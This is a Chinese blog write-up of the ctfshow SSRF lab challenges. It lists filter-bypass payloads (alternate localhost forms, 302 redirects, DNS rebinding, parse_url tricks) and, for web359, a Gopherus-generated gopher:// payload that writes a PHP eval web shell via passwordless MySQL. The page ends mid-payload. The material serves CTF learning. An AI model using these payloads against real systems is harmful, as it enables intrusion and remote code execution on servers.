<!DOCTYPE html><html lang="zh-CN"><head><meta charset="utf-8"/><meta name="viewport" content="width=device-width, initial-scale=1.0"/><meta name="author" content="jjjing"/><meta name="copyright" content="jjjing"/><meta name="theme-color" content="#FFB347"/><meta name="format-detection" content="telephone=no"/><meta name="keywords" content="Hexo Theme MEOW"/><meta name="mobile-web-app-capable" content="yes"/><meta name="apple-mobile-web-app-capable" content="yes"/><meta name="apple-touch-fullscreen" content="yes"/><meta name="application-name" content="ctfshow_web入门_ssrf | jjjing"/><meta name="apple-mobile-web-app-title" content="ctfshow_web入门_ssrf | jjjing"/><meta name="apple-mobile-web-app-status-bar-style" content="#FFB347"/><link rel="canonical" href="https://jinggg1123.github.io/archives/2022/08/09/ctfshowssrf/"/><meta name="description" content="SSRF基础SSRF(Server-Side Request Forgery:服务器端请求伪造) 就是让服务器去请求服务器的资源，因为我们远程请求不到。 12345678&lt;?php$url&#x3D;$_POST[&amp;#x27;url&amp;#x27;];$ch&#x3D;curl_init($url);curl_setopt($ch, CURLOPT_HEADER, 0);curl_setopt($ch, CU...">
<meta property="og:type" content="article">
<meta property="og:title" content="ctfshow_web入门_ssrf | jjjing">
<meta property="og:url" content="https://jinggg1123.github.io/archives/2022/08/09/ctfshowssrf/index.html">
<meta property="og:site_name" content="jjjing">
<meta property="og:description" content="SSRF基础SSRF(Server-Side Request Forgery:服务器端请求伪造) 就是让服务器去请求服务器的资源，因为我们远程请求不到。 12345678&lt;?php$url&#x3D;$_POST[&amp;#x27;url&amp;#x27;];$ch&#x3D;curl_init($url);curl_setopt($ch, CURLOPT_HEADER, 0);curl_setopt($ch, CU...">
<meta property="og:locale" content="zh_CN">
<meta property="og:image" content="https://jinggg1123.github.io/archives/2022/08/09/ctfshowssrf/assets/images/Hexo-Theme-MEOW.png">
<meta property="article:published_time" content="2022-08-09T13:10:33.000Z">
<meta property="article:modified_time" content="2024-12-08T13:23:38.042Z">
<meta property="article:author" content="jjjing">
<meta name="twitter:card" content="summary_large_image">
<meta name="twitter:image" content="https://jinggg1123.github.io/archives/2022/08/09/ctfshowssrf/assets/images/Hexo-Theme-MEOW.png"><meta name="robots" content="index,follow"/><meta name="googlebot" content="index,follow"/><meta name="revisit-after" content="1 days"/><title>ctfshow_web入门_ssrf | jjjing</title><link rel="shortcut icon" href="/assets/images/Hexo-Theme-MEOW.ico"><link rel="preconnect" href="/assets"/><link rel="preconnect" href="assets"/>
<link rel="stylesheet" href="/css/style.css">

<link rel="stylesheet" href="/css/third-party/dist/APlayer.min.css">
<link rel="prefetch" href="/"/><link rel="prefetch" href="/archives"/><link rel="prefetch" href="/tags"/><meta name="generator" content="Hexo 6.3.0"></head><body bg-style="none"><div class="post-progressbar-container"><div class="post-progressbar"></div></div><header><div id="navbar"><div id="nav-info"><a id="site-icon" href="/" title="主页"><img src="/assets/images/Hexo-Theme-MEOW.png" alt="Logo"/></a><a id="site-name" href="/" title="主页"><div>jjjing</div><img src="/assets/images/svg/uc/uc-home.svg" class="icon noview" alt="Icon"></a></div><div id="nav-menu"></div><div id="nav-function"><div id="menu-btn"><a href="javascript:void(0);" title="打开菜单"><img src="/assets/images/svg/uc/uc-menu.svg" class="icon noview" alt="Icon"></a></div></div></div></header><div id="menu-aside"><div id="menu-aside-container"><div id="menu-aside-info"><a href="/" title="主页"><img src="/assets/images/Hexo-Theme-MEOW.png" alt="Logo"/></a><a href="/" title="主页">jjjing</a></div><hr/></div></div><main><div class="banner"><div class="banner-info"><div class="banner-avatar"><img src="/assets/images/Hexo-Theme-MEOW.png" alt="Avatar"/></div><div class="banner-title">「 MEOW 」</div></div></div><div class="post-container"><div class="post-main"><div class="post-content"><h1 class="post-title">ctfshow_web入门_ssrf</h1><div class="post-author"><span>作者: jjjing</span></div><div class="post-meta"><div class="post-info"><div class="post-date"><div class="post-pubdate"><img src="/assets/images/svg/ta/ta-pubdate.svg" class="icon noview" alt="Icon"><span>发表于2022-08-09</span></div><div class="post-update"><img src="/assets/images/svg/ta/ta-update.svg" class="icon noview" alt="Icon"><span>更新于2024-12-08</span></div></div><div class="post-read"></div></div><div class="post-attribute"><div class="post-categories"><img src="/assets/images/svg/ta/ta-category.svg" class="icon noview" alt="Icon"><span><a class="post-categories-link" href="/categories/CTF/">CTF</a></span></div></div></div><div class="post markdown" indent="false"><h1><span id="ssrf基础">SSRF基础</span></h1><p>SSRF(Server-Side Request Forgery:服务器端请求伪造)</p>
<p>就是让服务器去请求服务器的资源，因为我们远程请求不到。</p>
<div class="code-container" code-lang="Php"><div class="codebox"><figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta">&lt;?php</span></span><br><span class="line"><span class="variable">$url</span>=<span class="variable">$_POST</span>[<span class="string">&#x27;url&#x27;</span>];</span><br><span class="line"><span class="variable">$ch</span>=<span class="title function_ invoke__">curl_init</span>(<span class="variable">$url</span>);</span><br><span class="line"><span class="title function_ invoke__">curl_setopt</span>(<span class="variable">$ch</span>, CURLOPT_HEADER, <span class="number">0</span>);</span><br><span class="line"><span class="title function_ invoke__">curl_setopt</span>(<span class="variable">$ch</span>, CURLOPT_RETURNTRANSFER, <span class="number">1</span>);</span><br><span class="line"><span class="variable">$result</span>=<span class="title function_ invoke__">curl_exec</span>(<span class="variable">$ch</span>);</span><br><span class="line"><span class="title function_ invoke__">curl_close</span>(<span class="variable">$ch</span>);</span><br><span class="line"><span class="meta">?&gt;</span></span><br></pre></td></tr></table></figure><div class="code-fold" title="Fold/Open"><svg xmlns="http://www.w3.org/2000/svg" width="24" height="24" viewBox="0 0 24 24" fill="none" stroke="currentColor" stroke-width="2" stroke-linecap="round" stroke-linejoin="round"><path stroke="none" d="M0 0h24v24H0z" fill="none"/><path d="M6 9l6 6l6 -6" /></svg></div><div class="code-copy" title="Copy"><svg xmlns="http://www.w3.org/2000/svg" width="24" height="24" viewBox="0 0 24 24" fill="none" stroke="currentColor" stroke-width="2"  stroke-linecap="round" stroke-linejoin="round"><path stroke="none" d="M0 0h24v24H0z" fill="none"/><path d="M7 7m0 2.667a2.667 2.667 0 0 1 2.667 -2.667h8.666a2.667 2.667 0 0 1 2.667 2.667v8.666a2.667 2.667 0 0 1 -2.667 2.667h-8.666a2.667 2.667 0 0 1 -2.667 -2.667z" /><path d="M4.012 16.737a2.005 2.005 0 0 1 -1.012 -1.737v-10c0 -1.1 .9 -2 2 -2h10c.75 0 1.158 .385 1.5 1" /></svg></div></div></div>
<ul>
<li>curl_init()：初始curl会话</li>
<li>curl_setopt()：会话设置</li>
<li>curl_exec()：执行curl会话,获取内容</li>
<li>curl_close()：会话关闭</li>
</ul>
<p><strong>gopher协议</strong><br>通过gopher协议，将请求体用url编码后加上任意字符,一般是下划线，接上gopher的url即可执行GET、POST请求</p>
<div class="code-container" code-lang="Shell"><div class="codebox"><figure class="highlight shell"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">gopher://ip:port/_[stream]</span><br></pre></td></tr></table></figure><div class="code-fold" title="Fold/Open"><svg xmlns="http://www.w3.org/2000/svg" width="24" height="24" viewBox="0 0 24 24" fill="none" stroke="currentColor" stroke-width="2" stroke-linecap="round" stroke-linejoin="round"><path stroke="none" d="M0 0h24v24H0z" fill="none"/><path d="M6 9l6 6l6 -6" /></svg></div><div class="code-copy" title="Copy"><svg xmlns="http://www.w3.org/2000/svg" width="24" height="24" viewBox="0 0 24 24" fill="none" stroke="currentColor" stroke-width="2"  stroke-linecap="round" stroke-linejoin="round"><path stroke="none" d="M0 0h24v24H0z" fill="none"/><path d="M7 7m0 2.667a2.667 2.667 0 0 1 2.667 -2.667h8.666a2.667 2.667 0 0 1 2.667 2.667v8.666a2.667 2.667 0 0 1 -2.667 2.667h-8.666a2.667 2.667 0 0 1 -2.667 -2.667z" /><path d="M4.012 16.737a2.005 2.005 0 0 1 -1.012 -1.737v-10c0 -1.1 .9 -2 2 -2h10c.75 0 1.158 .385 1.5 1" /></svg></div></div></div>



<h1><span id="web351">web351</span></h1><p>如果我们直接访问flag.php，会提示不允许外网访问，所以我们需要利用ssrf。</p>
<p>payload：</p>
<div class="code-container" code-lang="Awk"><div class="codebox"><figure class="highlight awk"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">url=http:<span class="regexp">//</span><span class="number">127.0</span>.<span class="number">0.1</span>/flag.php</span><br></pre></td></tr></table></figure><div class="code-fold" title="Fold/Open"><svg xmlns="http://www.w3.org/2000/svg" width="24" height="24" viewBox="0 0 24 24" fill="none" stroke="currentColor" stroke-width="2" stroke-linecap="round" stroke-linejoin="round"><path stroke="none" d="M0 0h24v24H0z" fill="none"/><path d="M6 9l6 6l6 -6" /></svg></div><div class="code-copy" title="Copy"><svg xmlns="http://www.w3.org/2000/svg" width="24" height="24" viewBox="0 0 24 24" fill="none" stroke="currentColor" stroke-width="2"  stroke-linecap="round" stroke-linejoin="round"><path stroke="none" d="M0 0h24v24H0z" fill="none"/><path d="M7 7m0 2.667a2.667 2.667 0 0 1 2.667 -2.667h8.666a2.667 2.667 0 0 1 2.667 2.667v8.666a2.667 2.667 0 0 1 -2.667 2.667h-8.666a2.667 2.667 0 0 1 -2.667 -2.667z" /><path d="M4.012 16.737a2.005 2.005 0 0 1 -1.012 -1.737v-10c0 -1.1 .9 -2 2 -2h10c.75 0 1.158 .385 1.5 1" /></svg></div></div></div>

<p>服务器处理这个值的时候，就是curl本机的flag.php文件。</p>
<h1><span id="web352-353">web352、353</span></h1><p>post接收url参数，然后用parse_url函数，将返回值给x</p>
<p>parse_url函数用法：<a target="_blank" rel="noopener" href="https://www.php.net/manual/zh/function.parse-url.php">PHP: parse_url - Manual</a></p>
<p>题目就是说，必须要用http或者https协议，然后不能使用localhost|127.0.0字符串。</p>
<p>我们需要绕过localhost|127.0.0，用0可以代替127.0.0.1</p>
<p>payload：</p>
<div class="code-container" code-lang="Awk"><div class="codebox"><figure class="highlight awk"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">url=http:<span class="regexp">//</span><span class="number">0</span>/flag.php</span><br></pre></td></tr></table></figure><div class="code-fold" title="Fold/Open"><svg xmlns="http://www.w3.org/2000/svg" width="24" height="24" viewBox="0 0 24 24" fill="none" stroke="currentColor" stroke-width="2" stroke-linecap="round" stroke-linejoin="round"><path stroke="none" d="M0 0h24v24H0z" fill="none"/><path d="M6 9l6 6l6 -6" /></svg></div><div class="code-copy" title="Copy"><svg xmlns="http://www.w3.org/2000/svg" width="24" height="24" viewBox="0 0 24 24" fill="none" stroke="currentColor" stroke-width="2"  stroke-linecap="round" stroke-linejoin="round"><path stroke="none" d="M0 0h24v24H0z" fill="none"/><path d="M7 7m0 2.667a2.667 2.667 0 0 1 2.667 -2.667h8.666a2.667 2.667 0 0 1 2.667 2.667v8.666a2.667 2.667 0 0 1 -2.667 2.667h-8.666a2.667 2.667 0 0 1 -2.667 -2.667z" /><path d="M4.012 16.737a2.005 2.005 0 0 1 -1.012 -1.737v-10c0 -1.1 .9 -2 2 -2h10c.75 0 1.158 .385 1.5 1" /></svg></div></div></div>

<p>另外的绕过方法：</p>
<ul>
<li><strong>127.1</strong>会被解析成127.0.0.1，也就意味着为零可缺省</li>
<li>在Linux中，<strong>0</strong>也会被解析成127.0.0.1</li>
<li>127.0.0.0&#x2F;8是一个环回地址网段，从<strong>127.0.0.1 ~ 127.255.255.254</strong>都表示localhost</li>
<li>ip地址还可以通过表示成其他<strong>进制</strong>的形式访问，<a target="_blank" rel="noopener" href="https://tool.520101.com/wangluo/jinzhizhuanhuan/">IP地址二进制、十进制、十六进制互换</a></li>
</ul>
<p>payload：</p>
<div class="code-container" code-lang="Awk"><div class="codebox"><figure class="highlight awk"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><span class="line">url=http:<span class="regexp">//</span><span class="number">127.1</span>/flag.php</span><br><span class="line">url=http:<span class="regexp">//</span><span class="number">0</span>/flag.php</span><br><span class="line">url=http:<span class="regexp">//</span><span class="number">127.255</span>.<span class="number">255.254</span>/flag.php</span><br><span class="line">url=http:<span class="regexp">//</span><span class="number">2130706433</span>/flag.php</span><br></pre></td></tr></table></figure><div class="code-fold" title="Fold/Open"><svg xmlns="http://www.w3.org/2000/svg" width="24" height="24" viewBox="0 0 24 24" fill="none" stroke="currentColor" stroke-width="2" stroke-linecap="round" stroke-linejoin="round"><path stroke="none" d="M0 0h24v24H0z" fill="none"/><path d="M6 9l6 6l6 -6" /></svg></div><div class="code-copy" title="Copy"><svg xmlns="http://www.w3.org/2000/svg" width="24" height="24" viewBox="0 0 24 24" fill="none" stroke="currentColor" stroke-width="2"  stroke-linecap="round" stroke-linejoin="round"><path stroke="none" d="M0 0h24v24H0z" fill="none"/><path d="M7 7m0 2.667a2.667 2.667 0 0 1 2.667 -2.667h8.666a2.667 2.667 0 0 1 2.667 2.667v8.666a2.667 2.667 0 0 1 -2.667 2.667h-8.666a2.667 2.667 0 0 1 -2.667 -2.667z" /><path d="M4.012 16.737a2.005 2.005 0 0 1 -1.012 -1.737v-10c0 -1.1 .9 -2 2 -2h10c.75 0 1.158 .385 1.5 1" /></svg></div></div></div>



<h1><span id="web354">web354</span></h1><p>过滤了localhost、1、0</p>
<p>1和0都过滤了那我们之前的payload就不好用了。</p>
<p><strong>方法一：域名指向</strong></p>
<p>在自己的域名中添加一条A记录指向 127.0.0.1</p>
<p>或者使用 <code>http://sudo.cc</code>这个域名就是指向127.0.0.1</p>
<p>payload：</p>
<div class="code-container" code-lang="Awk"><div class="codebox"><figure class="highlight awk"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">url=http:<span class="regexp">//</span>sudo.cc/flag.php</span><br></pre></td></tr></table></figure><div class="code-fold" title="Fold/Open"><svg xmlns="http://www.w3.org/2000/svg" width="24" height="24" viewBox="0 0 24 24" fill="none" stroke="currentColor" stroke-width="2" stroke-linecap="round" stroke-linejoin="round"><path stroke="none" d="M0 0h24v24H0z" fill="none"/><path d="M6 9l6 6l6 -6" /></svg></div><div class="code-copy" title="Copy"><svg xmlns="http://www.w3.org/2000/svg" width="24" height="24" viewBox="0 0 24 24" fill="none" stroke="currentColor" stroke-width="2"  stroke-linecap="round" stroke-linejoin="round"><path stroke="none" d="M0 0h24v24H0z" fill="none"/><path d="M7 7m0 2.667a2.667 2.667 0 0 1 2.667 -2.667h8.666a2.667 2.667 0 0 1 2.667 2.667v8.666a2.667 2.667 0 0 1 -2.667 2.667h-8.666a2.667 2.667 0 0 1 -2.667 -2.667z" /><path d="M4.012 16.737a2.005 2.005 0 0 1 -1.012 -1.737v-10c0 -1.1 .9 -2 2 -2h10c.75 0 1.158 .385 1.5 1" /></svg></div></div></div>

<p><strong>方法二：302跳转</strong></p>
<p>在自己的vps网页页面添加：</p>
<div class="code-container" code-lang="Isbl"><div class="codebox"><figure class="highlight isbl"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line"><span class="function"><span class="title">header</span>(<span class="string">&quot;Location:http://127.0.0.1/flag.php&quot;</span>)</span></span><br></pre></td></tr></table></figure><div class="code-fold" title="Fold/Open"><svg xmlns="http://www.w3.org/2000/svg" width="24" height="24" viewBox="0 0 24 24" fill="none" stroke="currentColor" stroke-width="2" stroke-linecap="round" stroke-linejoin="round"><path stroke="none" d="M0 0h24v24H0z" fill="none"/><path d="M6 9l6 6l6 -6" /></svg></div><div class="code-copy" title="Copy"><svg xmlns="http://www.w3.org/2000/svg" width="24" height="24" viewBox="0 0 24 24" fill="none" stroke="currentColor" stroke-width="2"  stroke-linecap="round" stroke-linejoin="round"><path stroke="none" d="M0 0h24v24H0z" fill="none"/><path d="M7 7m0 2.667a2.667 2.667 0 0 1 2.667 -2.667h8.666a2.667 2.667 0 0 1 2.667 2.667v8.666a2.667 2.667 0 0 1 -2.667 2.667h-8.666a2.667 2.667 0 0 1 -2.667 -2.667z" /><path d="M4.012 16.737a2.005 2.005 0 0 1 -1.012 -1.737v-10c0 -1.1 .9 -2 2 -2h10c.75 0 1.158 .385 1.5 1" /></svg></div></div></div>

<p>这样当服务器接收到我们传自己vps的域名时候，去curl它然后就会被重定向到自己127.0.0.1的flag.php文件。</p>
<p>payload：</p>
<div class="code-container" code-lang="Awk"><div class="codebox"><figure class="highlight awk"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">url=http:<span class="regexp">//</span>xxxxx/xxx.php</span><br></pre></td></tr></table></figure><div class="code-fold" title="Fold/Open"><svg xmlns="http://www.w3.org/2000/svg" width="24" height="24" viewBox="0 0 24 24" fill="none" stroke="currentColor" stroke-width="2" stroke-linecap="round" stroke-linejoin="round"><path stroke="none" d="M0 0h24v24H0z" fill="none"/><path d="M6 9l6 6l6 -6" /></svg></div><div class="code-copy" title="Copy"><svg xmlns="http://www.w3.org/2000/svg" width="24" height="24" viewBox="0 0 24 24" fill="none" stroke="currentColor" stroke-width="2"  stroke-linecap="round" stroke-linejoin="round"><path stroke="none" d="M0 0h24v24H0z" fill="none"/><path d="M7 7m0 2.667a2.667 2.667 0 0 1 2.667 -2.667h8.666a2.667 2.667 0 0 1 2.667 2.667v8.666a2.667 2.667 0 0 1 -2.667 2.667h-8.666a2.667 2.667 0 0 1 -2.667 -2.667z" /><path d="M4.012 16.737a2.005 2.005 0 0 1 -1.012 -1.737v-10c0 -1.1 .9 -2 2 -2h10c.75 0 1.158 .385 1.5 1" /></svg></div></div></div>



<h1><span id="web355">web355</span></h1><p>过滤，限制<code>http://[host]/[path]</code> host部分长度小于5</p>
<div class="code-container" code-lang="Xml"><div class="codebox"><figure class="highlight xml"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">[POST]payload：url=http://127.1/flag.php</span><br><span class="line">[POST]payload：url=http://0/flag.php</span><br></pre></td></tr></table></figure><div class="code-fold" title="Fold/Open"><svg xmlns="http://www.w3.org/2000/svg" width="24" height="24" viewBox="0 0 24 24" fill="none" stroke="currentColor" stroke-width="2" stroke-linecap="round" stroke-linejoin="round"><path stroke="none" d="M0 0h24v24H0z" fill="none"/><path d="M6 9l6 6l6 -6" /></svg></div><div class="code-copy" title="Copy"><svg xmlns="http://www.w3.org/2000/svg" width="24" height="24" viewBox="0 0 24 24" fill="none" stroke="currentColor" stroke-width="2"  stroke-linecap="round" stroke-linejoin="round"><path stroke="none" d="M0 0h24v24H0z" fill="none"/><path d="M7 7m0 2.667a2.667 2.667 0 0 1 2.667 -2.667h8.666a2.667 2.667 0 0 1 2.667 2.667v8.666a2.667 2.667 0 0 1 -2.667 2.667h-8.666a2.667 2.667 0 0 1 -2.667 -2.667z" /><path d="M4.012 16.737a2.005 2.005 0 0 1 -1.012 -1.737v-10c0 -1.1 .9 -2 2 -2h10c.75 0 1.158 .385 1.5 1" /></svg></div></div></div>



<h1><span id="web356">web356</span></h1><p>过滤，限制<code>http://[host]/[path]</code> host部分长度小于3</p>
<div class="code-container" code-lang="Xml"><div class="codebox"><figure class="highlight xml"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">[POST]payload：url=http://0/flag.php</span><br></pre></td></tr></table></figure><div class="code-fold" title="Fold/Open"><svg xmlns="http://www.w3.org/2000/svg" width="24" height="24" viewBox="0 0 24 24" fill="none" stroke="currentColor" stroke-width="2" stroke-linecap="round" stroke-linejoin="round"><path stroke="none" d="M0 0h24v24H0z" fill="none"/><path d="M6 9l6 6l6 -6" /></svg></div><div class="code-copy" title="Copy"><svg xmlns="http://www.w3.org/2000/svg" width="24" height="24" viewBox="0 0 24 24" fill="none" stroke="currentColor" stroke-width="2"  stroke-linecap="round" stroke-linejoin="round"><path stroke="none" d="M0 0h24v24H0z" fill="none"/><path d="M7 7m0 2.667a2.667 2.667 0 0 1 2.667 -2.667h8.666a2.667 2.667 0 0 1 2.667 2.667v8.666a2.667 2.667 0 0 1 -2.667 2.667h-8.666a2.667 2.667 0 0 1 -2.667 -2.667z" /><path d="M4.012 16.737a2.005 2.005 0 0 1 -1.012 -1.737v-10c0 -1.1 .9 -2 2 -2h10c.75 0 1.158 .385 1.5 1" /></svg></div></div></div>



<h1><span id="web357">web357</span></h1><p>因为代码中使用了 gethostbyname 获取了真实 IP 地址，所以域名指向方法不能再使用，可以使用 <strong>302 跳转方法和 dns rebinding 方法</strong></p>
<p><strong>DNS rebinding（DNS重新绑定攻击）</strong></p>
<p>攻击重点在于DNS服务能够在两次DNS查询中返回不用的IP地址，第一次是真正的IP，<strong>第二次是攻击目标IP地址</strong>，甚至可以通过这种攻击方法绕过同源策略</p>
<p>回到题目，在题目代码中一共对域名进行了两次请求，第一次是 gethostbyname 方法，第二次则是 file_get_contents 文件读取，可以通过 <a target="_blank" rel="noopener" href="http://ceye.io/">CEYE</a> 来实现攻击。</p>
<p>去<a target="_blank" rel="noopener" href="http://ceye.io/">CEYE</a> 注册账号，在个人信息页面，点击下面的<code>+ New DNS</code>，添加127.0.0.1和39.156.66.10（随便一个可用的ip）。</p>
<p>翻阅ceye的DNS Rebinding页面的介绍，有这么一句话：</p>
<blockquote>
<p>If your identifier is <code>abcdef.ceye.io</code>, then your DNS rebinding host is <code>r.abcdef.ceye.io</code>.</p>
</blockquote>
<p>所以要使用DNS重定向，我们要在域名前面加上<code>r.</code></p>
<p>payload：</p>
<div class="code-container" code-lang="Awk"><div class="codebox"><figure class="highlight awk"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">url=http:<span class="regexp">//</span>r.xxxxx.ceye.io/flag.php</span><br></pre></td></tr></table></figure><div class="code-fold" title="Fold/Open"><svg xmlns="http://www.w3.org/2000/svg" width="24" height="24" viewBox="0 0 24 24" fill="none" stroke="currentColor" stroke-width="2" stroke-linecap="round" stroke-linejoin="round"><path stroke="none" d="M0 0h24v24H0z" fill="none"/><path d="M6 9l6 6l6 -6" /></svg></div><div class="code-copy" title="Copy"><svg xmlns="http://www.w3.org/2000/svg" width="24" height="24" viewBox="0 0 24 24" fill="none" stroke="currentColor" stroke-width="2"  stroke-linecap="round" stroke-linejoin="round"><path stroke="none" d="M0 0h24v24H0z" fill="none"/><path d="M7 7m0 2.667a2.667 2.667 0 0 1 2.667 -2.667h8.666a2.667 2.667 0 0 1 2.667 2.667v8.666a2.667 2.667 0 0 1 -2.667 2.667h-8.666a2.667 2.667 0 0 1 -2.667 -2.667z" /><path d="M4.012 16.737a2.005 2.005 0 0 1 -1.012 -1.737v-10c0 -1.1 .9 -2 2 -2h10c.75 0 1.158 .385 1.5 1" /></svg></div></div></div>

<p><strong>要多点几次</strong></p>
<h1><span id="web358">web358</span></h1><p>正则，必须要以<code>http://ctf.</code>开头，以show结尾</p>
<ul>
<li>当<code>parse_url()</code>解析到邮箱时：**@前面是user**</li>
<li><code>file_get_contents()</code>会访问<code>host:port/path</code>，与user无关</li>
</ul>
<p>因此构建payload：</p>
<div class="code-container" code-lang="Xml"><div class="codebox"><figure class="highlight xml"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">url=http://ctf.@127.0.0.1/flag.php#show</span><br></pre></td></tr></table></figure><div class="code-fold" title="Fold/Open"><svg xmlns="http://www.w3.org/2000/svg" width="24" height="24" viewBox="0 0 24 24" fill="none" stroke="currentColor" stroke-width="2" stroke-linecap="round" stroke-linejoin="round"><path stroke="none" d="M0 0h24v24H0z" fill="none"/><path d="M6 9l6 6l6 -6" /></svg></div><div class="code-copy" title="Copy"><svg xmlns="http://www.w3.org/2000/svg" width="24" height="24" viewBox="0 0 24 24" fill="none" stroke="currentColor" stroke-width="2"  stroke-linecap="round" stroke-linejoin="round"><path stroke="none" d="M0 0h24v24H0z" fill="none"/><path d="M7 7m0 2.667a2.667 2.667 0 0 1 2.667 -2.667h8.666a2.667 2.667 0 0 1 2.667 2.667v8.666a2.667 2.667 0 0 1 -2.667 2.667h-8.666a2.667 2.667 0 0 1 -2.667 -2.667z" /><path d="M4.012 16.737a2.005 2.005 0 0 1 -1.012 -1.737v-10c0 -1.1 .9 -2 2 -2h10c.75 0 1.158 .385 1.5 1" /></svg></div></div></div>



<h1><span id="web359">web359</span></h1><p>题目提示：打无密码的mysql</p>
<p>一个登录界面，点击登录，抓包发现可疑<strong>参数 returl 存在 SSRF</strong></p>
<p>使用<a target="_blank" rel="noopener" href="https://github.com/tarunkant/Gopherus">Gopherus工具</a>，选择mysql模块，默认用户root，sql注入语句写个shell文件：</p>
<div class="code-container" code-lang="Shell"><div class="codebox"><figure class="highlight shell"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br></pre></td><td class="code"><pre><span class="line">python gopherus.py  --exploit mysql</span><br><span class="line"></span><br><span class="line">Give MySQL username: root</span><br><span class="line">Give query to execute: select &quot;&lt;?php eval($_POST[cmd]); ?&gt;&quot; into outfile &quot;/var/www/html/cmd.php&quot;;</span><br><span class="line">Your gopher link is ready to do SSRF :</span><br><span class="line"></span><br><span class="line">gopher://127.0.0.1:3306/_%a3%00%00%01%85%a6%ff%01%00%00%00%01%21%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%72%6f%6f%74%00%00%6d%79%73%71%6c%5f%6e%61%74%69%76%65%5f%70%61%73%73%77%6f%72%64%00%66%03%5f%6f%73%05%4c%69%6e%75%78%0c%5f%63%6c%69%65%6e%74%5f%6e%61%6d%65%08%6c%69%62%6d%79%73%71%6c%04%5f%70%69%64%05%32%37%32%35%35%0f%5f%63%6c%69%65%6e%74%5f%76%65%72%73%69%6f%6e%06%35%2e%37%2e%32%32%09%5f%70%6c%61%74%66%6f%72%6d%06%78%38%36%5f%36%34%0c%70%72%6f%67%72%61%6d%5f%6e%61%6d%65%05%6d%79%73%71%6c%4c%00%00%00%03%20%73%65%6c%65%63%74%20%22%3c%3f%70%68%70%20%65%76%61%6c%28%24%5f%50%4f%53%54%5b%63%6d%64%5d%29%3b%20%3f%3e%22%20%69%6e%74%6f%20%6f%75%74%66%69%6c%65%20%22%2f%76%61%72%2f%77%77%77%2f%68%74%6d%6c%2f%63%6d%64%2e%70%68%70%22%3b%01%00%00%00%01</span><br></pre></td></tr></table></figure><div class="code-fold" title="Fold/Open"><svg xmlns="http://www.w3.org/2000/svg" width="24" height="24" viewBox="0 0 24 24" fill="none" stroke="currentColor" stroke-width="2" stroke-linecap="round" stroke-linejoin="round"><path stroke="none" d="M0 0h24v24H0z" fill="none"/><path d="M6 9l6 6l6 -6" /></svg></div><div class="code-copy" title="Copy"><svg xmlns="http://www.w3.org/2000/svg" width="24" height="24" viewBox="0 0 24 24" fill="none" stroke="currentColor" stroke-width="2"  stroke-linecap="round" stroke-linejoin="round"><path stroke="none" d="M0 0h24v24H0z" fill="none"/><path d="M7 7m0 2.667a2.667 2.667 0 0 1 2.667 -2.667h8.666a2.667 2.667 0 0 1 2.667 2.667v8.666a2.667 2.667 0 0 1 -2.667 2.667h-8.666a2.667 2.667 0 0 1 -2.667 -2.667z" /><path d="M4.012 16.737a2.005 2.005 0 0 1 -1.012 -1.737v-10c0 -1.1 .9 -2 2 -2h10c.75 0 1.158 .385 1.5 1" /></svg></div></div></div>

<p>还需要进行一次url编码（从<code>_</code>开始），payload：</p>
<div class="code-container" code-lang="Llvm"><div class="codebox"><figure class="highlight llvm"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">returl<span class="operator">=</span>gopher://<span class="number">127.0</span>.<span class="number">0.1</span>:<span class="number">3306</span>/_<span class="variable">%25</span>a<span class="number">3</span><span class="variable">%2500</span><span class="variable">%2500</span><span class="variable">%2501</span><span class="variable">%2585</span><span class="variable">%25</span>a<span class="number">6</span><span class="variable">%25</span>ff<span class="variable">%2501</span><span class="variable">%2500</span><span class="variable">%2500</span><span class="variable">%2500</span><span class="variable">%2501</span><span class="variable">%2521</span><span class="variable">%2500</span><span class="variable">%2500</span><span class="variable">%2500</span><span class="variable">%2500</span><span class="variable">%2500</span><span class="variable">%2500</span><span class="variable">%2500</span><span class="variable">%2500</span><span class="variable">%2500</span><span class="variable">%2500</span><span class="variable">%2500</span><span class="variable">%2500</span><span class="variable">%2500</span><span class="variable">%2500</span><span class="variable">%2500</span><span class="variable">%2500</span><span class="variable">%2500</span><span class="variable">%2500</span><span class="variable">%2500</span><span class="variable">%2500</span><span class="variable">%2500</span><span class="variable">%2500</span><span class="variable">%2500</span><span class="variable">%2572</span><span class="variable">%256</span>f<span class="variable">%256</span>f<span class="variable">%2574</span><span class="variable">%2500</span><span class="variable">%2500</span><span class="variable">%256</span>d<span class="variable">%2579</span><span class="variable">%2573</span><span class="variable">%2571</span><span class="variable">%256</span><span class="keyword">c</span><span class="variable">%255</span>f<span class="variable">%256</span>e<span class="variable">%2561</span><span class="variable">%2574</span><span class="variable">%2569</span><span class="variable">%2576</span><span class="variable">%2565</span><span class="variable">%255</span>f<span class="variable">%2570</span><span class="variable">%2561</span><span class="variable">%2573</span><span class="variable">%2573</span><span class="variable">%2577</span><span class="variable">%256</span>f<span class="variable">%2572</span><span class="variable">%2564</span><span class="variable">%2500</span><span class="variable">%2566</span><span class="variable">%2503</span><span class="variable">%255</span>f<span 